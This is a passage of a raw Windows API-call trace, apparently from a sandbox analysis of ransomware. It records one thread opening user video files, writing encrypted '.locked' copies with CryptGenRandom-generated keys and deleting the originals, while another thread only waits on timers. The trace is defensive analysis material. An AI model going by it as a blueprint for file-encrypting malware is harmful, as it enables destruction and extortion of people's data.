(hEvent=0x21c) returned 1 [0310.557] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0310.559] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0310.627] SetEvent (hEvent=0x12c) returned 1 [0310.627] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0310.632] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0310.633] SetEvent (hEvent=0x184) returned 1 [0310.633] SetEvent (hEvent=0x22c) returned 1 [0310.633] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0311.568] SetEvent (hEvent=0x22c) returned 1 [0311.568] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0311.570] SetEvent (hEvent=0x12c) returned 1 [0311.570] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0311.677] SetEvent (hEvent=0x14c) returned 1 [0311.677] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0311.689] SetEvent (hEvent=0x1dc) returned 1 [0311.689] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0311.696] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0311.696] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0311.816] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x1) returned 0x102 [0311.826] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0311.826] SetEvent (hEvent=0x21c) returned 1 [0311.826] SetEvent (hEvent=0x180) returned 1 [0311.826] SetEvent (hEvent=0x1dc) returned 1 [0311.826] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0311.829] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x19faa8, ulCount=0x10, ulNumEntriesRemoved=0x19fa88, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x19faa8, ulNumEntriesRemoved=0x19fa88) returned 0 [0311.829] SetEvent (hEvent=0x150) returned 1 [0311.829] SetEvent (hEvent=0x180) returned 1 [0311.829] SetEvent (hEvent=0x1dc) returned 1 [0311.829] SetEvent (hEvent=0x21c) returned 1 [0311.829] SetEvent (hEvent=0x20c) returned 1 [0311.829] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0312.409] SetEvent (hEvent=0x1dc) returned 1 [0312.409] SetEvent (hEvent=0x1ac) returned 1 [0312.409] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0318.259] SetEvent (hEvent=0x14c) returned 1 [0318.259] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0318.303] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390060*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125a3a24, lpReserved=0x0 | out: lpBuffer=0x12390060*, lpNumberOfCharsWritten=0x125a3a24*=0xc) returned 1 [0318.305] SetEvent (hEvent=0x21c) returned 1 [0318.305] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\9eQ3WMUXkM.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\9eq3wmuxkm.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0318.305] GetConsoleMode (in: hConsoleHandle=0x1f8, lpMode=0x125a3d9c | out: lpMode=0x125a3d9c) returned 0 [0318.305] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\9eQ3WMUXkM.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\9eq3wmuxkm.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0318.655] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0318.690] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x125a3d9c | out: lpMode=0x125a3d9c) returned 0 [0318.690] SetEvent (hEvent=0x21c) returned 1 [0318.690] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0318.693] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0318.694] SetEvent (hEvent=0x1e8) returned 1 [0318.694] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0318.737] SetEvent (hEvent=0x12c) returned 1 [0318.737] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0318.765] SetEvent (hEvent=0x20c) returned 1 [0318.765] WriteFile (in: hFile=0x1f4, lpBuffer=0x1322e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ae78, lpOverlapped=0x0 | out: lpBuffer=0x1322e000*, lpNumberOfBytesWritten=0x1276ae78*=0xfa000, lpOverlapped=0x0) returned 1 [0318.780] CloseHandle (hObject=0x1f4) returned 1 [0318.780] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\4Jdh3Gyu6WoYeQm.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\4jdh3gyu6woyeqm.flv")) returned 1 [0318.808] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0318.961] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12657a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12657a24*=0xc) returned 1 [0318.996] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\wpDqCDIcADj00.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\wpdqcdicadj00.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0318.996] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12657d9c | out: lpMode=0x12657d9c) returned 0 [0318.996] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\wpDqCDIcADj00.flv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\wpdqcdicadj00.flv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0320.435] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x12657d9c | out: lpMode=0x12657d9c) returned 0 [0320.435] SetEvent (hEvent=0x220) returned 1 [0320.435] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0320.711] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0320.721] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0320.780] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\tkHozG_R-B1rJV9S7Ic.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\tkhozg_r-b1rjv9s7ic.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0320.780] GetConsoleMode (in: hConsoleHandle=0x240, lpMode=0x125d9e88 | out: lpMode=0x125d9e88) returned 0 [0320.780] WriteFile (in: hFile=0x240, lpBuffer=0x17c36000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125d9e78, lpOverlapped=0x0 | out: lpBuffer=0x17c36000*, lpNumberOfBytesWritten=0x125d9e78*=0xfa000, lpOverlapped=0x0) returned 1 [0320.800] CloseHandle (hObject=0x240) returned 1 [0320.800] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\tkHozG_R-B1rJV9S7Ic.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\tkhozg_r-b1rjv9s7ic.swf")) returned 1 [0320.804] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\FUcQzp6TqxWfef2jhFpt.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\fucqzp6tqxwfef2jhfpt.mp4")) returned 1 [0320.839] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0320.955] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\lhMzml c.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\lhmzml c.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0320.955] GetConsoleMode (in: hConsoleHandle=0x23c, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0320.955] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\lhMzml c.swf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\lhmzml c.swf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0320.956] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0320.956] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0320.956] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766070 | out: pbBuffer=0x12766070) returned 1 [0320.956] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0320.956] WriteFile (in: hFile=0x1f4, lpBuffer=0x12649000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e7d78, lpOverlapped=0x0 | out: lpBuffer=0x12649000*, lpNumberOfBytesWritten=0x125e7d78*=0x80, lpOverlapped=0x0) returned 1 [0320.959] ReadFile (in: hFile=0x23c, lpBuffer=0x194ec000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x194ec000*, lpNumberOfBytesRead=0x125e7d68*=0x8262, lpOverlapped=0x0) returned 1 [0320.960] WriteFile (in: hFile=0x1f4, lpBuffer=0x194ec000*, nNumberOfBytesToWrite=0x8262, lpNumberOfBytesWritten=0x125e7d74, lpOverlapped=0x0 | out: lpBuffer=0x194ec000*, lpNumberOfBytesWritten=0x125e7d74*=0x8262, lpOverlapped=0x0) returned 1 [0320.994] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0321.084] ReadFile (in: hFile=0x23c, lpBuffer=0x194ec000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x194ec000*, lpNumberOfBytesRead=0x125e7d68*=0x0, lpOverlapped=0x0) returned 1 [0321.084] CloseHandle (hObject=0x1f4) returned 1 [0321.118] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0321.123] CloseHandle (hObject=0x23c) returned 1 [0321.123] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0321.123] GetConsoleMode (in: hConsoleHandle=0x23c, lpMode=0x125e7e94 | out: lpMode=0x125e7e94) returned 0 [0321.123] WriteFile (in: hFile=0x23c, lpBuffer=0x12646060*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x125e7e64, lpOverlapped=0x0 | out: lpBuffer=0x12646060*, lpNumberOfBytesWritten=0x125e7e64*=0x2f, lpOverlapped=0x0) returned 1 [0321.124] CloseHandle (hObject=0x23c) returned 1 [0321.124] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\lhMzml c.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\lhmzml c.swf")) returned 1 [0321.205] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0321.207] SetEvent (hEvent=0x14c) returned 1 [0321.207] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) returned 0x0 [0321.209] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0xffffffff) Thread: id = 6 os_tid = 0x1204 Thread: id = 7 os_tid = 0x1220 [0122.904] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3244ff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3244ff58*=0x108) returned 1 [0122.904] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0122.913] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0122.929] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0123.694] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0123.758] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0123.768] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0123.770] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0123.814] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0123.828] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0123.842] timeEndPeriod (uPeriod=0x1) returned 0x0 [0123.842] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x150 [0123.842] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0125.285] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0125.285] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0125.304] SetEvent (hEvent=0x128) returned 1 [0125.304] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0125.308] timeEndPeriod (uPeriod=0x1) returned 0x0 [0125.308] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x102 [0135.399] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xc2f5) returned 0x0 [0141.645] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0141.645] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0141.721] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0141.726] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0141.738] SetEvent (hEvent=0x128) returned 1 [0141.738] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0141.748] timeEndPeriod (uPeriod=0x1) returned 0x0 [0141.748] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0141.797] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0141.797] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0141.841] SetEvent (hEvent=0x128) returned 1 [0141.842] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0141.878] timeEndPeriod (uPeriod=0x1) returned 0x0 [0141.878] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0143.738] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0143.738] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0143.740] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0143.782] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0143.784] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0143.786] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0143.788] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0143.879] SetEvent (hEvent=0x128) returned 1 [0143.879] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0143.890] timeEndPeriod (uPeriod=0x1) returned 0x0 [0143.891] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0144.211] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0144.211] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.241] SetEvent (hEvent=0x128) returned 1 [0144.241] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.260] timeEndPeriod (uPeriod=0x1) returned 0x0 [0144.260] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0144.393] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0144.393] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.398] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0144.433] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.437] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.439] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.441] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.445] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.484] SetEvent (hEvent=0x128) returned 1 [0144.484] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.506] timeEndPeriod (uPeriod=0x1) returned 0x0 [0144.506] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0144.625] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0144.625] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.653] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.660] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.705] SetEvent (hEvent=0x128) returned 1 [0144.705] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.724] timeEndPeriod (uPeriod=0x1) returned 0x0 [0144.725] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0144.774] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0144.774] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.851] SetEvent (hEvent=0x128) returned 1 [0144.851] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0144.862] timeEndPeriod (uPeriod=0x1) returned 0x0 [0144.863] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0146.606] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0146.606] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0146.796] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0146.943] SetEvent (hEvent=0x128) returned 1 [0146.943] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0146.948] timeEndPeriod (uPeriod=0x1) returned 0x0 [0146.948] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0147.006] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0147.006] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0147.043] SetEvent (hEvent=0x128) returned 1 [0147.043] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0147.053] timeEndPeriod (uPeriod=0x1) returned 0x0 [0147.053] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0149.425] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0149.425] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0149.430] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0149.519] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0149.530] SetEvent (hEvent=0x128) returned 1 [0149.530] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0149.534] timeEndPeriod (uPeriod=0x1) returned 0x0 [0149.534] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0149.589] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0149.589] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0149.624] SetEvent (hEvent=0x128) returned 1 [0149.624] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0149.630] timeEndPeriod (uPeriod=0x1) returned 0x0 [0149.631] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0151.372] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0151.372] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0151.499] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0151.541] SetEvent (hEvent=0x128) returned 1 [0151.541] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0151.555] timeEndPeriod (uPeriod=0x1) returned 0x0 [0151.555] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0151.719] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0151.719] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0151.753] SetEvent (hEvent=0x128) returned 1 [0151.753] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0151.764] timeEndPeriod (uPeriod=0x1) returned 0x0 [0151.764] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0153.204] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0153.204] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0153.206] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0153.320] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0153.324] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0153.326] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0153.328] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0153.331] SetEvent (hEvent=0x128) returned 1 [0153.331] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0153.338] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0153.375] SetEvent (hEvent=0x128) returned 1 [0153.375] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0153.395] timeEndPeriod (uPeriod=0x1) returned 0x0 [0153.395] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0154.802] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0154.802] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0154.869] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0154.904] SetEvent (hEvent=0x128) returned 1 [0154.904] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0154.908] timeEndPeriod (uPeriod=0x1) returned 0x0 [0154.908] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0154.979] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0154.979] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0155.002] SetEvent (hEvent=0x128) returned 1 [0155.002] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0155.007] timeEndPeriod (uPeriod=0x1) returned 0x0 [0155.007] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0157.587] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0157.587] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0157.593] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0157.706] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0157.710] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0157.715] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0157.717] SetEvent (hEvent=0x128) returned 1 [0157.717] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0157.757] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0157.776] SetEvent (hEvent=0x128) returned 1 [0157.776] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0157.800] timeEndPeriod (uPeriod=0x1) returned 0x0 [0157.800] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0159.309] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0159.309] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0159.390] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0159.455] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0159.497] SetEvent (hEvent=0x128) returned 1 [0159.497] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0159.515] timeEndPeriod (uPeriod=0x1) returned 0x0 [0159.516] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0159.580] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0159.580] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0159.610] SetEvent (hEvent=0x128) returned 1 [0159.610] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0159.629] timeEndPeriod (uPeriod=0x1) returned 0x0 [0159.629] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0161.840] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0161.841] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0161.932] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0161.938] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0161.941] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0161.942] SetEvent (hEvent=0x128) returned 1 [0161.943] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0161.947] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0161.989] SetEvent (hEvent=0x128) returned 1 [0161.989] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0162.018] timeEndPeriod (uPeriod=0x1) returned 0x0 [0162.018] WaitForSingleObject 